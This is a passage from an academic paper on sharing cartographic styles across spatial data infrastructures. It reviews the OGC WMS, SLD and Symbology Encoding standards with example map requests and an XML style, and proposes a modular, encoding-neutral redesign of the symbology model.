demand. Hopfstock & Grünreich (2009) underline that poor map design results are the consequence of a “too technology- and/or data-driven approach” and propose improvements by making the cartographic design knowledge explicit and operational. Beside such a relevant proposition at the design level, this paper has a focus on the implementation level by making portrayal interoperability operational through the improvement of the open standards dedicated to cartography. Indeed, interoperability is key for SDI as interconnected computing systems that can work together to accomplish a common task. And the presence of open standards is required to allow these different systems to communicate with each other without depending on a particular actor (Sykora et al., 2007). The common task presently in question is about the ability for a user community interconnected by interoperable systems to share a cartography used for the authoring of a map. That is, not only the result of a cartographic rendering built of a set of pixels, but also the underlying cartographic instructions which describe how the map is authored. We can figure out how such an ability would participate to empower all types of users, from the cartographic professionals to data artists, journalists and coders (Field, 2014) to gain useful geographical information by means of cartographic visualizations. An ability that contributes to the power of maps, from tools which enable the sharing of spatial information and knowledge, to collaboration through shared creativity and skills transfer between “produsers” for better decision making (Bruns, 2013). For cartographic portrayal interoperability, many SDI policies, like INSPIRE Drafting Team (2014), advise the use of standards from Open Geospatial Consortium (OGC) like the Styled Layer Descriptor (SLD) (Lupp, 2007) and Symbology Encoding (SE) Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 2/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ specifications (Müller, 2006), but it seems these standards were not able to bring to reality the above vision that goes as far as considering SDI as open participation platforms. We might blame the fact that moving from closed monolithic applications to open distributed systems is still under way (Sykora et al., 2007) and that cartography must take effect providing a methodology with a user-oriented approach (Hopfstock & Grünreich, 2009). But this paper wants to show how it is also important to have syntactic portrayal interoperability operational with a mature open specification able to standardize the cartographic instructions. We show that the current OGC SE standard does offer limited capabilities for describing cartographic symbolizations. Then, while we develop some recommendations to improve the situation through more capabilities to customize the map symbology, we also propose some good practices to favor the adoption of the standard by implementors so as to make it really operational for the long term. We believe that these propositions should lead to rich cartographic portrayal interoperability, going further than basic styles. There is no reason SDI users have to be satisfied with often unsuitable maps. FROM MAP DESIGN TO PORTRAYAL INTEROPERABILITY Clearly, many definitions and types of map exist. As Tyner (2010) writes “We all know what a map is, but that definition can vary from person to person and culture to culture.” However, many of them do share the idea of a map as an intellectual construction that is based on the experience and knowledge of the cartographer to manipulate data input according initial hypotheses and its capacity to play with graphic signs (Slocum et al., 2009; Tyner, 2010). Furthermore, even if the definition is hard to settle, cartographers have also worked to formalize map syntactics by developing symbol categories and rules to combine them. Visual variables are symbols that can be applied to data in order to reveal information. Largely based on the Bertin & Berg (2010) classification, several cartographic authors agree with a set of commons visual variables (Carpendale, 2003; MacEachren, 2004; Tyner, 2010): shape, size, hue (color), value, texture, orientation (Fig. 1). To create a map, they are individually manipulated or piled up by the cartographer in the process to visually map information about point, line and area features to visual variables (MacEachren, 2004; Slocum et al., 2009). This visual mapping is an embellishment design to improve the aesthetic quality and express efficiently a message (Wood & Fels, 1992). Even if creating map is an aesthetical exercise it is also a science that must respect some rules to make sure that the representation is accurate. A de facto set of best practices based on visual variables has been accepted by the academy of cartographers (Montello, 2002; McMaster & McMaster, 2002). As Bertin & Berg (2010) explains, the choice of the “right” visual variable, which would be most appropriate to represent each aspect of information, depends on the type of geographical object but also its characteristics (MacEachren, 2004; Nicolas & Christine, 2013). For example, like the statistical nature of the data (qualitative, quantitative), raw data must be represented with proportional symbols and a density of values by an areal classification (i.e., a choropleth map). Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 3/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ These map syntactics are the results of the mainstream cartographic theory and the related design knowledge that help to understand how and why certain displays are more successful for spatial inference and decision making than others. This subject is an important issue to improve map quality at the design phase (Hopfstock & Grünreich, 2009). But also at the implementation phase, the theory related to these visual variables to compose map symbols is suitable to drive the definition of a standardized styling language that must be functionally designed and implemented into the geospatial tools making up SDI. In order to explain how such a standardized styling language is an essential piece to enable cartographic portrayal interoperability, let us clarify the related concept of sharing cartography. We consider four use cases typical of sharing levels: � Level 1: discover At this level, SDI users discover pre-styled and ready to be visualized map layers, eventually coming from different systems, they can combine to build a map. For example, it corresponds to the classical geoportal applications offering the user to discover and explore prepared maps and combine prepared layers from various thematics (e.g., map.geo.admin.ch). Typically, it does also match with the story of the fictive SDI user Mr Tüftel in the Web Portrayal Services book (Andrae et al., 2011). Mr Tüftel wants to unify on the same map the water pipes from his municipality but also the pipes from the municipalities in the neighborhood. These are different data sources he wants to combine in his everyday GIS tool. Finally, during the discovery of AreaPoint LineSymbol Shape Size Hue Value Texture Orientation Variable Figure 1 The visual variables of symbols. Full-size DOI: 10.7717/peerj-cs.143/fig-1 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 4/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-1 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ some cartographic facets, the user gains knowledge of the potential of the underlying data sources hosted by the different systems. � Level 2: author Starting from level 1, the potential of the underlying data sources may give to the SDI user some ideas of analytical process which requires to create a new style different from the default. For example, this is useful for Mr Tüftel in the case he would like to create an unified map of water pipes, but with the problem of getting different visualizations of the pipes (e.g., different colors) from the different municipalities. He would then author a common style (e.g., same color) so as to take the control of the whole rendering process. Even further, Mr Tüftel may enrich the analytical process and take benefit of an extra underlying data that classifies each pipe according to its function (either wastewater or rainwater). He would then author a new style (e.g., orange color for wastewater pipes, blue color for rainwater pipes) so as to produce a suitable map to decide where to build the intercommunal water treatment plant. Starting from level 2 some specific use cases become relevant: � Level 3: catalog It is about having at disposal style catalogs offering ready-to-use styles, often tailored for specific thematics, e.g., noise mapping color palettes (EPA, 2011). The ability to import such a specialized symbology into users’ tool just avoid to reinvent the wheel in the sense of re-creating the style from scratch. By analogy, the catalog style use case is similar to how the OGC Catalog Service for metadata works. � Level 4: collaborate The context of this use case is wider and involves several SDI users into a collaborative authoring process. Several users contribute to the creation of a common map, each user having specialized skills to complement one another so as to tell stories as maps, each using her(his) own software (Ertz, Julien & Bocher, 2012). In other words, cartographic portrayal interoperability enable the freedom to the users to work with the tools they are most comfortable and productive with. Also, we may notice the educational capacity of this use case. Considering a team of people with different levels of skills in cartography, there are offered the chance to share them. As pointed out by Iosifescu-Enescu, Hugentobler & Hurni (2010), “the use of standardized exchange languages is commonly considered as the most practical solution for interoperability especially when it is required to collate resources, like data, from various systems,” but also when it is to take the control of a distributed cartographic rendering process. Definitely, starting from level 2, the definition of a standardized styling language is essential to share cartography: that is the underlying cartographic instruction, what we call the symbology code which constitutes a style that describes how a map is authored. Such a definition can be achieved in the same way Iosifescu-Enescu & Hurni (2007) try to define a cartographic ontology by considering that “the building blocks for digital map-making are the primary visual variables (color, opacity, texture, orientation, arrangement, shape, size, focus) and the patterns (arrangement, texture, and Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 5/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ orientation).” Also, another starting point is to consider a map (either general-purpose maps, special-purpose maps or thematic maps) as being composed of some graphic elements (either geometric primitives or pictorial elements). This approach matches the OGC SE standard which is the standardized styling language (Lupp, 2007) in question here: a style is applied on a dataset to render a map considering a composition of possible symbol elements (called Symbolizer) that carry graphical properties (equivalent to visual variables). So as to complete the definition of cartographic portrayal interoperability, Fig. 2 shows that such a styling language is at the core of the third stage of the cartographic pipeline, the one dedicated to the style rendering. Thus it is to notice that the map layout design which configures a title, a legend, a north arrow, a scale bar, etc. (Peterson, 2009), is out of our scope, as well as the preprocessing stage which is dedicated to the preparation of the dataset to visualize. As an example, building an anamorphic map requires a preliminary processing to generate consistent geometries with preserved shape and topology before styling them. The next part does focus on the technical aspects about how current open standards are able or not to fully meet the conditions of such a cartographic portrayal interoperability. OPEN STANDARDS FOR SHARING CARTOGRAPHY Given the concept of sharing cartography defined by the above four use cases, let us see what are the possibilities and limits to implement them using OGC standards. Figure 2 The four stages of the cartographic map design, inspired from Nicolas & Christine (2013). Full-size DOI: 10.7717/peerj-cs.143/fig-2 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 6/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-2 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Use case “discover” The OGC Web Map Service (WMS) standard (De la Beaujardiere, 2006) is currently the only widely accepted open standard for map visualization which standardizes the way for Web clients to request maps with predefined symbolization (Iosifescu-Enescu, Hugentobler & Hurni, 2010). This ability, as illustrated with Fig. 3, does match the use case level 1 allowing to discover ready-to-visualize map layers and to combine them to build maps. Figure 3 Discovery of ready to be visualized map layers with OGC WMS standard. Full-size DOI: 10.7717/peerj-cs.143/fig-3 Figure 4 Visualization of the grid of map sheets of Switzerland (1:25,000) through a default cartographic style showing a choropleth symbology based on the year of edition of the sheet. Full-size DOI: 10.7717/peerj-cs.143/fig-4 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 7/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-3 http://dx.doi.org/10.7717/peerj-cs.143/fig-4 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ Just send a simple GetMap request to the Swisstopo WMS server to get a predefined colored map layer to overlay in your web mapping application (Fig. 4): https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST= GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata- kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT= 1185&BBOX=475000,68000,854000,305000 The WMS GetMap operation allows to choose one of the internal styles prepared for a layer by a map-maker (parameter STYLES). Each style is related to one or more datasets attached to the WMS server and ready to be used by an end-user. Use case “author” The analysis of the use case level 2 described in chapter 2 shows that it is required to establish an open framework able to facilitate decision making through customized maps. Iosifescu-Enescu (2007) does underline that the WMS standard combined with the SLD profile and the SE is able to fulfill such a requirement. The ability to drive remotely the authoring of visualizations is fundamental for this use case, for example to fulfill the cartographic requirements of Mr Tüftel. He does not want to download the spatial data, he just wants to adjust the visualization according to his specific needs (Fig. 5). Just send the below WMS/SLD request which has a reference to a style file. This latter includes some SE instructions which allow to get a customized visualization (Fig. 6): https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST= GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata- kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT= 1185&BBOX=475000,68000,854000,305000&SLD=http://my.server/style.sld Figure 5 Authoring of user style to visualize map layers with OGC WMS/SLD and SE standards. Full-size DOI: 10.7717/peerj-cs.143/fig-5 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 8/31 https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000 https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000 https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000 https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000 https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000&SLD=http://my.server/style.sld https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000&SLD=http://my.server/style.sld https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000&SLD=http://my.server/style.sld https://wms.geo.admin.ch/?SERVICE=WMS&VERSION=1.0.0&REQUEST=GetMap&FORMAT=image/png&LAYERS=ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt&SRS=EPSG:21781&STYLES=&WIDTH=1895&HEIGHT=1185&BBOX=475000,68000,854000,305000&SLD=http://my.server/style.sld http://dx.doi.org/10.7717/peerj-cs.143/fig-5 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ The WMS/SLD GetMap operation allows to reference a style authored by the user client, either hosted on an external server (parameter SLD) or directly sent with the WMS request (parameter SLD_BODY). <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <StyledLayerDescriptor version="1.0.0" xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"> <NamedLayer> <Name>ch.swisstopo.pixelkarte-pk25.metadata-kartenblatt</Name> <UserStyle> <Name>LabelBlattnummer</Name> <FeatureTypeStyle> <Rule> <PolygonSymbolizer> <Fill> <CssParameter name="fill">#FFFF00</CssParameter> </Fill> <Stroke> <CssParameter name="stroke">#333333</CssParameter> <CssParameter name="stroke-width">2</CssParameter> </Stroke> </PolygonSymbolizer> <TextSymbolizer> <Label> <ogc:PropertyName>Blattnummer</ogc:PropertyName> </Label> <Font> <CssParameter name="font-family">arial</CssParameter> <CssParameter name="font-size">18</CssParameter> </Font> <Fill> <CssParameter name="fill">#000000</CssParameter> </Fill> </TextSymbolizer> </Rule> </FeatureTypeStyle> </UserStyle> </NamedLayer> </StyledLayerDescriptor> Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 9/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ In other words, the user client (e.g., Mr Tüftel) does take the control of the rendering process that may be distributed among many WMS servers. Indeed, this ability to drive remotely from the user client side (with a map viewer including a style editor) the WMS rendering server does open interesting doors to bring to life the other use cases. Use case “catalog” Going further than using a simple WMS GetMap request to get a ready-to-visualize map layer, the deprecated implementation specification (version 1.0, released in 2002) of the WMS/SLD standard (Lalonde, 2002) does offer style management requests like GetStyles. So you get also the underlying symbology instructions of an internal style that has been predefined and used by the server to show a prepared cartographic facet of some spatial data of the underlying datasets. Thus, the retrieved style is ready to be reworked by the user client within a cartographic tool (Fig. 7). While such an ability is already interesting for the use case level 2, the SLD 1.0 style management offers not only GetStyles operation but also PutStyles operation. Together, these operations are a good start for the use case level 3 to build a catalog of styles. The WMS service is then also the storage point to discover, import and export styles to share with other SDI users through a catalog service. Nonetheless, it is to notice that the newest SLD 1.1 release does not specify anymore the style management requests which is then a step back. Use case “collaborate” Finally, for the use case level 4, the SE standard is also a centerpiece (Fig. 8). As experimented by Bocher et al. (2012) in the frame of the SOGVILLE/SCAPC2 research projects, SE Figure 6 Visualization of the grid of map sheets of Switzerland (1:25,000) through another cartographic facet showing labels based on the sheet number. Full-size DOI: 10.7717/peerj-cs.143/fig-6 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 10/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-6 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ instructions are encapsulated into a structure of map project that different users share and work together in the frame of a collaborative cartographic authoring process. Indeed, while the OGC OWS Context standard is used to formalize the map project, it does in particular consider SLD and SE to formalize the shared styles used to render the map layers. Currently, SLD (SLD 1.0) or SE (SE 1.1) (as styling language to formulate symbology instructions) are the more advanced open standards for sharing cartography as illustrated Figure 7 Re-authoring of styles shared through catalogs with OGC WMS/SLD standards. Full-size DOI: 10.7717/peerj-cs.143/fig-7 Figure 8 Creation of a common map based on shared styles with OGC WMS/SLD, SE and OWS Context standards. Full-size DOI: 10.7717/peerj-cs.143/fig-8 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 11/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-7 http://dx.doi.org/10.7717/peerj-cs.143/fig-8 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ by the above use case levels. These standards are quite largely adopted by server-side rendering systems. It can be explained because SLD is a WMS application profile which is web service oriented. Indeed, Andrae et al. (2011) redraws the OGC portrayal model by showing clearly SLD as the web interface to take control of the rendering engine behind the WMS service. But in 2005, the WMS/SLD 1.1 profile has been released in particular with the aim to extract the symbology instructions into a dedicated standard, the SE standard (SE 1.1). As a consequence, while the SLD profile stays strongly related to WMS service, it is no longer the case for the symbology instructions which can now be used by any styling software component, not only by WMS/SLD. Nonetheless, at the desktop-side there are only few software which correctly and completely implement SE standard together with a graphical user interface to (re)work styles. Indeed, according to Bocher et al. (2011) many implementations have a conformance that is often not fully observed leading to interoperability defects in term of rendering quality. Apart from inherent bugs and dysfunctions of a tool, several reasons can explain this general situation. � Due to a partial implementation—see MapServer implementation (McKenna, 2011), there are unimplemented symbology instructions, e.g., linejoin and linecap of LineSymbolizer; � Due to the existence of two versions of symbology instructions between SLD 1.0 and SE 1.1, these tools may not check this correctly which causes parsing problems of the XML encoding; � Due to the divergent reading of what the SE 1.1 standard tries to specify which may result in different graphical visualizations (it means there are uncomplete or ambiguous explanations in the specification—like the MarkIndex capability which doesn’t specify anything on how to select an individual glyph); � Related to the previous point, there is currently no substantial testsuite within the OGC Compliance and Interoperability Testing Initiative (“CITE”) to help to disambiguate and test the graphical rendering conformance of an implementation. Beyond encoding validity and level of conformance of an implementation (range of supported capabilities), visual interpretation is essential (see Annex A in Müller (2006)). For instance, by comparing the output of a system to test with the output of the reference implementation. While the above arguments do show how it is essential to have a common styling language (currently in the name of OGC SE 1.1), this importance is accentuated by the fact that many changes and proposals have been received by the standard working group (SWG), in particular from the scientific community (Duarte Teixeira, De Melo Cuba & Mizuta Weiss, 2005; Cooper, Sykora & Hurni, 2005; Sykora et al., 2007; Dietze & Zipf, 2007; Sae-Tang & Ertz, 2007; Schnabel & Hurni, 2007; Mays, 2012; Iosifescu-Enescu, Hugentobler & Hurni, 2010; Bocher et al., 2011; Rita, Borbinha & Martins, 2012; Bocher & Ertz, 2015). All these works share a common claim about enhancing SE. It seems the communities of users were frustrated because no substantial new symbology capabilities Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 12/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ have been introduced with the release of SE 1.1 except transformations functions. Moreover, Bocher et al. (2011) and Bocher & Ertz (2015), explain that these only new and few capabilities (interpolate, recode, categorize functions) cause confusions and even some regressions. For instance, despite all the good intentions, there are several limits that come out from the introduction of the categorize function (defined by SE 1.1 standard as the transformation of continuous values to distinct values, e.g., useful to build choropleth maps): � The definition seems to only match a requirement emphasized by Jenks (Slocum et al., 2009) that classes must cover all the possible values of the dataset and must not be discontinuous. However, such a definition has limits considering optimal methods like the Jenks–Fisher classification or Maximum Breaks classifications that may produce intervals with gaps (Slocum et al., 2009) and that it is often better to use the lowest value of the dataset as the minimum value of the first interval rather than negative infinity; � The categorize function is redundant with the concept of Rule of the SE standard. Moreover, the latter does offer wider possibilities to define precisely value intervals (minimum/maximum values instead of negative/positive infinite, non-contiguous intervals, interval as singleton); � Similarly, the RasterSymbolizer concept used to control the styling of raster data has been reduced because of the ColorMapEntry concept from SLD 1.0 has been replaced by the categorize transformation function; � Finally, the introduction of categorize function has also removed from SLD 1.0 the capability to associate a label to an interval when it is an important requirement to have such an information to build a map legend. Along the same lines, the many proposed extensions of SLD and SE standards have to be analyzed. The purpose is to identify how these cartographic enhancements are relevant for the redesign of the SE standard. By way of other examples, Sae-Tang & Ertz (2007) describe four new possibilities to generate thematic maps (CategoryThematicSymbolizer, SimpleThematicSymbolizer, MultiThematicSymbolizer, ChartThematicSymbolizer). A similar approach appears in Dietze & Zipf (2007) (DiagramSymbolizer and ChoroplethSymbolizer) and in Iosifescu-Enescu, Hugentobler & Hurni (2010) to support various diagram types (e.g., pie charts, bar diagrams) to fulfill the complex visualization requirements coming from environmental management. Also, the specific options introduced within the XSD schemas by some off-the-shelf geospatial software (e.g., “GeoServer”) have to be considered. Of course the extensible nature of XML is convenient to add cartographic capabilities to implement in the software, but it may at the same time also create some non-interoperable defects. Clearly, it seems SE 1.1 has never been designed with modularization and extensibility in mind and there are no explicit extension points defined in the underlying symbology model. Moreover, the SE standard does currently only offer one XML-based encoding and strongly linked to XML modeling principles (Fig. 9). As a consequence, it may be Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 13/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ difficult for cartographic communities and developers having different encoding preferences (e.g., CSS-like or JSON-based) to get a chance to observe conformance. Indeed, while there is a general trend to dislike XML, other encodings seem to be in fashion, like the YAML-based YSLD styling language proposed by GeoServer (2017) in addition to the support of OGC SLD standard, or the CSS-derived styling languages MapCSS (OpenStreetMap, 2017) or CartoCSS styling language from Mapbox (2017), although it seems already old-fashioned (MacWright, 2016). Also, there are major proponents of an encoding which would make a wider use of relevant and famous graphical standards like SVG, just like OWS Context does use the famous Atom syndication format (Brackin & Gonçalves, 2014). Beyond the trends, there is no consensus by now. Figure 9 The physical symbology model of SE formalized with XML Schema Definition. Full-size DOI: 10.7717/peerj-cs.143/fig-9 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 14/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-9 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ To conclude this chapter, while there are clear possibilities to implement the four levels of sharing cartography, it is also clear that a revision of the common styling language played by the SE standard is required. Three major requirements have to be considered: � Enrich the standard with new cartographic capabilities inline with the evolution of the needs coming from the map-makers community; � Redesign the underlying symbology model of the standard so as to be modular and extensible for the long-term; � Consider the possibility to have other encodings than XML. The next chapter does develop some proposals to fulfill these requirements. PROPOSALS The overall purpose is to make standards dedicated to cartography (in particular SE) more attractive by turning them into “a really useful (cartographic) engine,” quoting the nod to Thomas the Tank Engine alluded by the OGC “Specification Model—A Standard for Modular specifications” document (Policy SWG, 2009), called the modular spec in below. Before compiling all the Change Requests collected by the SLD/SE SWG, one question does arise: how to plug a new requested ability in the standard? One first and fundamental recommendation is then to consider the modular spec whose release 1.0 has been edited in 2009, at the time the SE standard was already released and thus not in compliance with. Indeed, the modular spec specifies generic rules to organize the internal logical structure of the standard in a modular way so as to strengthen the guarantee of a useful and worth standard easy to implement but also to extend. Modular structure: one symbology core, many symbology extensions The modular spec fittingly suggests modularity with the idea of a standard built of one simple core and many extensions which expand the functionality of the specification. Applied to a new revision of the SE standard, the definition of a symbology core requires first to “reverse design” the underlying symbology model of SE 1.1. After which, the concrete symbology capabilities have to be extracted and split into many relevant extensions while taking care of dependencies. The proposed minimal symbology core illustrated by Fig. 10 is partially abstract and defined according to the following concepts: � The Style concept, in charge of the cartographic portrayal of a collection of features stored within a Layer by applying at least one symbology Rule. A feature is described as an abstraction of real world phenomena as defined by GML standard (Portele, 2007); Figure 10 Recommendation for a minimal symbology core. Full-size DOI: 10.7717/peerj-cs.143/fig-10 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 15/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-10 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ � The rendering does run feature per feature using a “one drawing pass” engine; � Each Rule may be scale filtered and does hold at least one Symbolizer; � Each Symbolizer does describe the graphical parameters for drawing the features (visual variables); � The Style, Rule and Symbolizer concepts hold parameters which are literal values. Some of the concepts are defined as abstract (in yellow and with italic names in Fig. 10) so as to be considered as extension points. Actually, regarding this, we may notice that Craig (2009) does request a similar concept by the use of XML abstract elements which may than be considered as extension points. Now that the core is ready, some surrounding extensions may be defined so that the engine is really able to perform a rendering. Indeed, alone, the core does not concretely “do” anything. As an example, let us introduce the AreaSymbolizer extension which holds a simple and classical symbolizer, call it the AreaSymbolizer concept which describes the graphical parameters for drawing polygonal features with outlined and filled surface areas. The aim of the below explanations is to illustrate with a simple example the extension mechanism and how extension points are expanded. At first, it is defined that the AreaSymbolizer extension has a dependency with the FeatureTypeStyle extension and the related concepts: � The FeatureTypeStyle specialization of the Style core concept; � The portrayal of a Layer built of N instances of GML AbstractFeatureType (Portele, 2007); � The ability to access features according to Simple Feature SF-2 (Van den Brink, Portele & Vretanos, 2012); � The geometry parameter to each Symbolizer extension that depends on this extension (in this case the AreaSymbolizer extension). Then, given that the geometry parameter is defined with a dependency on the ValueReference extension, the ValueReference specialization of the ParameterValue core concept is introduced. In a general way, when a parameter has to be assigned with a value, ValueReference does introduce the ability to reference the value extracted from a data attribute of a feature. This is useful when a FeatureType does hold many geometry properties and allows to reference the one to be used by the renderer. Finally, the AreaSymbolizer extension itself is required, holding the AreaSymbolizer specialization of the Symbolizer core concept. Called PolygonSymbolizer in SE 1.1 and correctly renamed AreaSymbolizer by Craig (2009), it does introduce: � The symbology ability to draw a surface area according to a filling and an outline; � The dependency on the FeatureTypeStyle, Fill and Stroke extensions; � The ability to reference the geometry data attribute to be drawn (by means of its dependency on the FeatureTypeStyle extension). Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 16/31 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ In consequence, an implementation that wants to observe conformance with the AreaSymbolizer extension requires to implement and drive its rendering engine according to all the concepts of the core (thin outline in Fig. 11) and the AreaSymbolizer concept with all the other concepts required by dependencies (bold outline in Fig. 11). Nonetheless, even at this point, a rendering engine would neither concretely “do” anything. Indeed, the implementation has then to offer choices related to the filling and the outline. Some more concrete capabilities have to be implemented, for instance with (dashed outline in Fig. 11): � The SolidFill concept, a Fill specialization which introduces the graphical ability to define a solid color value combined with an opacity; � The PenStroke concept, a Stroke specialization which introduces the graphical ability to draw a continuous or dashed line with or without join and cap; � The dependent abstract Color concept (and again a concrete choice of color definition has to be done, like with the RGBColor concept which defines a color in the sRGB color space with three integer values). Having this modularity approach for long term extensibility applied to all the symbolizer concepts, past, present and future, an implementation can with ease manage step by step the evolution of the conformance level of its technical implementation of the standard. One encoding-neutral conceptual model, many encodings Currently, SE 1.1 offers a physical model using XML Schema Definition and, at the same time, a natural encoding based on XML. The initial motivation explaining the below recommendation is related to the fact that there is not only XML, but also many other flavors of encoding, JSON-like, CSS-like, YAML-like among many others it is possible to imagine. The important for portrayal interoperability is not the encoding, it is rather the Figure 11 Concepts to implement so as to observe conformance with the AreaSymbolizer extension. Full-size DOI: 10.7717/peerj-cs.143/fig-11 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 17/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-11 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ symbology model. That is why the “one encoding-neutral model/many encodings” approach is promising to favor a large adoption of the standard. This approach has on one side the encoding-neutral model formalized using UML notations, it can be considered as conceptual. With a class diagram, it does describe the portrayal concepts, their relationships, the modular organization, the extension points and the dependencies. We may notice that UML is often preferred when some work is about the design of portrayal concepts. In Zipf (2005), a simplified version of the underlying symbology model of SE 1.1 is depicted as an UML class diagram. Moreover, Craig (2009) does suggest to avoid the XSD attribute concept in the XML encoding so as to be more portable to other structuring languages which do not have the unusual attribute concept of XML Schema, UML in particular. These are more arguments that are in favor of defining at first a conceptual and encoding-neutral model (Fig. 12). Consequently, doors are open to offer a variety of encodings. Each encoding does translate into a format the UML notations according to mapping rules. At least one Figure 12 Extract of the proposed symbology model. Full-size DOI: 10.7717/peerj-cs.143/fig-12 Bocher and Ertz (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.143 18/31 http://dx.doi.org/10.7717/peerj-cs.143/fig-12 http://dx.doi.org/10.7717/peerj-cs.143 https://peerj.com/computer-science/ default encoding and following the OGC tradition, XML may be this default encoding. It is up to the SWG to define the mapping rules to translate the semantic of the conceptual model into XML Schema definitions. Indeed, as noticed by Lonjon, Thomasson & Maesano (2006), the translation from UML to XML requires a thoughtful analysis of the conceptual model so as to define the global mapping rules (e.g., translate a specialization relationship using static or dynamic typing? how to translate a concrete class, an abstract class, the various types of associations? when using attributes or elements?, etc.). Thus, UML and XML are together a winning combination two times inline with the modular specification which recommend UML “If the organizing mechanism for the data model used in the specification is an object model” and XML “for any specification which has as one of its purposes the introduction of a new XML schema.” Of course, all these questions related to the mapping rules have to be considered for each encoding offered with the standard. We may notice that the OWS Context SWG adopted a similar approach, offering the default encoding based on XML Atom and planning to provide an OWS Context JSON Encoding soon, according to Brackin & Gonçalves (2014). Style management and parametrized symbolizer Beyond the tempting recommendation to reintroduce the WMS/SLD GetStyles and PutStyles methods, the management of a catalog of styles has to be expanded. Thus, 